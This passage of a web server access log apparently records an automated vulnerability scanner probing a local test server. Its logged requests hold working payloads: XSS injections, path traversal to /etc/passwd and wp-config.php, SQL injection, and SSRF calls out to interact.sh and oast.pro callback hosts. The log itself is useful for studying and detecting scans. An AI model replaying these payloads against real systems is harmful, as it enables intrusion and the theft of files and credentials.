/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.304","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22csrf_token\x22\x0D\x0A\x0D\x0A{{csrf}}\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229N5EgmP9YgUvnKT7jLYJISY1Vp.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x0D\x0A \x22type\x22: \x2229N5EgmP9YgUvnKT7jLYJISY1Vp\x22\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /variable/varimport HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.083","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/admin/variable/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A &test;\x0D\x0A \x0D\x0A \x0D\x0A com.jamfsoftware.jamfdistributionserver\x0D\x0A 1652940608\x0D\x0A \x0D\x0A 00000000-0000-0000-0000-000000000000\x0D\x0A com.jamfsoftware.jamf.distributionserverinventoryrequest\x0D\x0A \x0D\x0A 1999\x0D\x0A 1652940608\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 34\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /client HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.095","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/59 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.098","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.prod.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=rsvp-admin-export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.099","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"\x221\x22:1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.076","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/help/support HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://ca2tuc8smpv1g2s80ca0y3xj8r3guns1s.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m_login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:08 +0000","request_body":"fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/supportInstaller HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.076","http_user_agent":"MSIE", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php/home/file/user_pics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zipkin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adfs/ls/idpinitiatedsignon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rootDesc.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configurations HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ibmmq/console/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/61 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre=29N5EiI9MWyNtSZ8ilG6QyaUpyi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/setup.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/static/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hm/login.action 